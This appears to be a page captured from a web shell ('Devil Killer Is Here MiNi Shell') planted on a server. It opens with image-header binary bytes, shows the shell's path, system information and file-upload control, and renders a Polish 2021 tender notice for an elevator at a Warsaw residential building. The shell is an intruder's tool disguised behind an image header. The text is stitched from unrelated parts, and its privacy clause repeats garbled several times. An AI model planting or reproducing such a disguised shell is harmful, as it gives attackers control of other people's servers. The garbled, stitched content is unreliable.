JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210817/0015179001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa szybu windowego wraz z urządzeniem dźwigu osobowego w budynku mieszkalnym przy ul. Bieniewickiej 2a systemie „zaprojektuj i buduj”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&quot;ZAKŁAD GOSPODAROWANIA NIERUCHOMOŚCIAMI W DZIELNICY ŻOLIBORZ M.ST. WARSZAWY&quot;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011104337</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marii Kazimiery 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-641</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">223903609</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pgrochot@zgnzoliborz.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgnzoliborz.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa szybu windowego wraz z urządzeniem dźwigu osobowego w budynku mieszkalnym przy ul. Bieniewickiej 2a systemie „zaprojektuj i buduj”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3e5c7d85-ff4f-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00151790</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004619/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa zewnętrznej windy - ul. Bieniewicka 2a</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zgnzoliborz.ezamawiajacy.pl; <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.zgnzoliborz.ezamawiajacy.pl;adres email: pgrochot@zgnzoliborz.waw.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywasię drogą elektroniczną przy użyciu Platformy eZamawiający<br/>https://zgnzoliborz.ezamawiajacy.pl/ orazpoczty elektronicznej.2. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzieleniezamówienia publicznego, musi posiadać konto na Platformie<br/>eZamawiający. Wykonawca posiadającykonto na Platformie eZamawiający ma dostęp do formularzy:<br/>złożenia, zmiany i wycofania oferty orazdo formularza do komunikacji. 3. Wymagania techniczne i<br/>organizacyjne wysyłania i odbieraniadokumentów elektronicznych, cyfrowych odwzorowań<br/>dokumentów oraz informacji przekazywanychprzy ich użyciu zostały opisane na Platformie<br/>eZamawiający. 4. Wykonawca przystępując doniniejszego postępowania o udzielenie zamówienia<br/>publicznego, akceptuje warunki korzystania z Platformy eZamawiający oraz zobowiązuje się<br/>korzystając z Platformy eZamawiający przestrzegać postanowień opisanych na platformie. 5.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany i wycofania oferty oraz do komunikacji wynosi 150 MB.6. Za datę przekazania dokumentów<br/>elektronicznych, cyfrowych odwzorowań dokumentów oraz innych informacji przyjmuje się datę ich<br/>przekazania na Platformie eZamawiający, a w przypadku przekazywania tych dokumentów oraz<br/>informacji za pomocą poczty elektronicznej - datą ich przesłania będzie potwierdzenie dostarczenia<br/>wiadomości zawierającej dokument/informację z serwera pocztowego Zamawiającego.7. Zamawiający<br/>przekazuje link do postępowaniahttps://zgnzoliborz.ezamawiajacy.pl/ oraz Numer postępowania<br/>ZGN/PZP/17/2021 jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na<br/>Liście przetargów PZP, przetargi „Aktualne” klikając wcześniej opcję „Dla Wykonawców”.8. W<br/>postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w<br/>szczególności składanie dokumentów elektronicznych (innych niż oferta oraz załączniki do oferty),<br/>cyfrowych odwzorowań dokumentów oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularzadostępnego na Platformie eZamawiający. We wszelkiej<br/>korespondencji związanej z niniejszympostępowaniem Zamawiający i Wykonawcy posługują się<br/>numerem ogłoszenia (BZP). Zamawiającymoże również komunikować się z Wykonawcami za pomocą<br/>poczty elektronicznej, email:pgrochot@zgnzoliborz.waw.pl9. Dokumenty elektroniczne (inne niż oferta<br/>oraz załączniki do oferty)oraz cyfrowe odwzorowania dokumentów składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość<br/>składania ww. dokumentów elektronicznych oraz cyfrowych odwzorowań dokumentów za pomocą<br/>poczty elektronicznej, na adres email pgrochot@zgnzoliborz.waw.pl 10. Sposób sporządzenia<br/>dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia z dnia 30 grudnia 2020 r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452). 11. Zamawiający nie przewiduje<br/>sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula<br/>informacyjna dotycząca przetwarzania danych osobowych 1. Zgodnie z art. 13 ust. 1 i 2<br/>rozporządzenia Parlamentu Europejskiego i Rady(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych orazuchyleniadyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(Dz. Urz. UE L119 z04.05.2016, str.1), dale j„RODO”, informuję, że: • administratorem Pani/Pana<br/>danych osobowych jest ZakładGospodarowaniaNieruchomościami w Dzielnicy Żoliborz m.st. Warszawy<br/>ul. Marii Kazimiery1,01-641Warszawa; • w sprawach związanych z Pani/Pana danymi proszę<br/>kontaktować się z Inspektorem Ochrony Danych, kontakt pisemny za pomocą poczty elektronicznej na<br/>adresemail:iod@zgnzoliborz.waw.pl; •Pani/Pana dane osobowe przetwarzane będą na podstawie art.<br/>6 ust.1lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie<br/>zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest<br/>obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych<br/>spoczywający na Zamawiającym; •odbiorcami Pani/Pana danych osobowych będą osoby lub<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74<br/>ustawy Pzp;•Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez<br/>okres 4latod dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza4lata,okresprzechowywania obejmuje cały czas trwania umowy; • obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiemustawowymokreślonymwprzepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>oudzieleniezamówieniapublicznego;konsekwencje niepodania określonych danych wynikają z<br/>ustawyPzp; • wodniesieniu doPani/Panadanych osobowych decyzje nie będą podejmowane<br/>wsposóbzautomatyzowany, stosowaniedo art. 22RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani: − na podstawie<br/>art.15RODOprawodostępu do danych osobowych Pani/Pana dotyczących; − na podstawie art.<br/>16RODOprawodosprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym<br/>skorzystaniezprawadosprostowania lub uzupełnienia nie może skutkować zmianą<br/>wynikupostępowaniaoudzieleniezamówienia publicznego ani zmianą postanowień umowy w Posiada Pan/Pani: − na podstawie<br/>art.15RODOprawodostępu do danych osobowych Pani/Pana dotyczących; − na podstawie art.<br/>16RODOprawodosprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym<br/>skorzystaniezprawadosprostowania lub uzupełnienia nie może skutkować zmianą<br/>wynikupostępowaniaoudzieleniezamówienia publicznego ani zmianą postanowień umowy w Posiada Pan/Pani: − na podstawie<br/>art.15RODOprawodostępu do danych osobowych Pani/Pana dotyczących; − na podstawie art.<br/>16RODOprawodosprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym<br/>skorzystaniezprawadosprostowania lub uzupełnienia nie może skutkować zmianą<br/>wynikupostępowaniaoudzieleniezamówienia publicznego ani zmianą postanowień umowy w Posiada Pan/Pani: − na podstawie<br/>art.15RODOprawodostępu do danych osobowych Pani/Pana dotyczących; − na podstawie art.<br/>16RODOprawodosprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym<br/>skorzystaniezprawadosprostowania lub uzupełnienia nie może skutkować zmianą<br/>wynikupostępowaniaoudzieleniezamówienia publicznego ani zmianą postanowień umowy w zakresieniezgodnym zustawąPzp oraznie może naruszać integralności protokołu oraz jego<br/>załączników. − napodstawie art.18RODO prawożądania od administratora ograniczenia przetwarzania<br/>danychosobowychzzastrzeżeniemprzypadków, o których mowa w art. 18 ust. 2 RODO, przy czym<br/>prawo doograniczeniaprzetwarzanianie ma zastosowania w odniesieniu do przechowywania,<br/>wceluzapewnienia korzystaniaze środkówochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznejlubprawnej, lub z uwagi naważnewzględy interesu publicznego Unii Europejskiej<br/>lubpaństwaczłonkowskiego, a także nieograniczaprzetwarzania danych osobowych do<br/>czasuzakończeniapostępowania o udzieleniezamówienia. −prawo do wniesienia skargi do Prezesa<br/>UrzęduOchrony Danych Osobowych, gdy uznaPani/Pan, żeprzetwarzanie danych osobowych<br/>Pani/Panadotyczącychnarusza przepisy RODO; • nieprzysługuje Pani/Panu: w związku z art. 17 ust. 3<br/>lit. b, d lube RODOprawo do usunięcia danych osobowych; −prawo do przenoszenia danych<br/>osobowych, októrym mowaw art. 20 RODO; − napodstawie art. 21RODO prawo sprzeciwu, wobec<br/>przetwarzaniadanychosobowych, gdyż podstawąprawnąprzetwarzania Pani/Pana danych osobowych<br/>jest art. 6 ust. 1lit. cRODO.2.JednocześnieZamawiający przypomina o ciążącym na<br/>Pani/Panuobowiązkuinformacyjnymwynikającym z art. 14RODO względem osób fizycznych, których<br/>daneprzekazanezostanąZamawiającemu w związku zprowadzonym postępowaniem i które<br/>Zamawiającypośredniopozyska odwykonawcy biorącego udziałw postępowaniu, chyba że ma<br/>zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGN/PZP/17/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej (projektu budowlanego,<br/>projektów wykonawczych oraz opracowań technicznych dla inwestycji), uzyskanie pozwolenia<br/>na budowę oraz wykonanie na podstawie dokumentacji projektowej i pozwolenia na budowę<br/>niezbędnych robót budowlanych, a także montaż i uruchomienie zewnętrznej windy osobowej w<br/>budynku przy ul. Bieniewickiej 2a na terenie Dzielnicy Żoliborz m.st. Warszawy. Zgodnie z<br/>Programem Funkcjonalno – Użytkowym – załącznik Nr 6 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia określonego w niniejszej SWZ mogą ubiegać się wykonawcy, którzy<br/>spełniają następujące warunki udziału w postępowaniu określone przez zamawiającego,<br/>dotyczące: 1) nie podlegają wykluczeniu na podstawie art. 108 ust.1 i 109 ust.1 pkt.42) zdolności<br/>do występowania w obrocie gospodarczym tzn.są wpisani do jednego z rejestrów zawodowych<br/>lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania, co w<br/>przypadku wykonawców mających siedzibę na terenie Rzeczypospolitej Polskiej (RP) oznacza,<br/>że są wpisani do Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej3) uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej, o ile wynika to z odrębnych przepisów tzn.: Zamawiający nie stawia warunku w<br/>tym zakresie 4) sytuacji ekonomicznej lub finansowej tzn.W celu wykazania spełnienia warunku<br/>posiadania sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia<br/>Wykonawca winien wykazać się posiadaniem dokumentu potwierdzającego, że wykonawca jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia w wysokości sumy gwarancyjnej nie mniejszej niż 400.000,00 zł;5)<br/>zdolności technicznej lub zawodowej tzn.Wykonawca spełni warunek jeżeli wykaże, że -<br/>dysponuje min. 1 osobą, która będzie brała udział w realizacji zamówienia posiadającą<br/>uprawnienia do kierowania robotami budowalnymi w specjalności: - konstrukcyjno–budowlanej<br/>zgodnie z wymaganiami ustawy Prawo budowlane lub odpowiadające im równoważne<br/>uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów; - dysponuje min. 1 osobą, która będzie brała udział w realizacji zamówienia,<br/>posiadającą uprawnienia do kierowania robotami budowalnymi w specjalności: instalacyjnej w<br/>zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych zgodnie wymaganiami ustawy Prawo budowlane lub odpowiadające im równoważne uprawnienia w tej<br/>specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów;-<br/>dotyczących budowy wind osobowych zewnętrznych o wartości nie mniejszej niż 250.000,00 zł<br/>brutto (każda). Wykonawca może wykazać się realizacją zamówień z okresu ostatnich pięciu lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków<br/>udziału w postępowaniu składane wraz z ofertą pod rygorem nieważności, w formie elektronicznej.1)<br/>Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków<br/>udziału w postępowaniu, w zakresie wskazanym przez zamawiającego w pkt. VI, XV SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Aktualny odpis z właściwego rejestru lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji wystawiony nie<br/>wcześniej niż 6 miesięcy przed jego złożeniem.Wyjaśnienie: Wykonawca nie jest zobowiązany do<br/>złożenia informacji z KRS lub CEiDG, jeżeli zamawiający może go uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile wykonawca dostarczył dane umożliwiające dostęp do tych<br/>dokumentów, b) wykazu robót, o których mowa w części VI ust. 1 pkt 5 tiret 2 SWZ (wg wzoru<br/>stanowiącego załącznik do materiałów postępowania) wykonanych w okresie ostatnich pięciu lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie –<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty te<br/>zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. Do<br/>wykazu robót Wykonawca powinien dołączyć informację, czy roboty wymienione w wykazie robót<br/>wykonał sam czy potwierdzają wiedzę i doświadczenie innego podmiotu, którego zobowiązanie do<br/>udostępnienia wiedzy i doświadczenia winien załączyć wraz ze zobowiązaniem do jego udziału w<br/>wykonaniu części zamówienia;c) wykazu osób, skierowanych przez wykonawcę do realizacji<br/>zamówienia publicznego, o których mowa w części VI ust. 1 pkt 5 tiret 1 i 2 SWZ, wraz z informacjami<br/>na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami (wg wzoru stanowiącego załącznik do<br/>materiałów postępowania). W przypadku, gdy Wykonawca polega na osobach zdolnych do wykonania<br/>zamówienia innych podmiotów niezależnie od charakteru łączących go z nimi stosunków, do wykazu<br/>załącza pisemne zobowiązanie innych podmiotów do oddania Wykonawcy, do dyspozycji niezbędnych<br/>osób na okres korzystania z nich przy wykonaniu zamówienia).d) dokumentu potwierdzającego, że<br/>wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 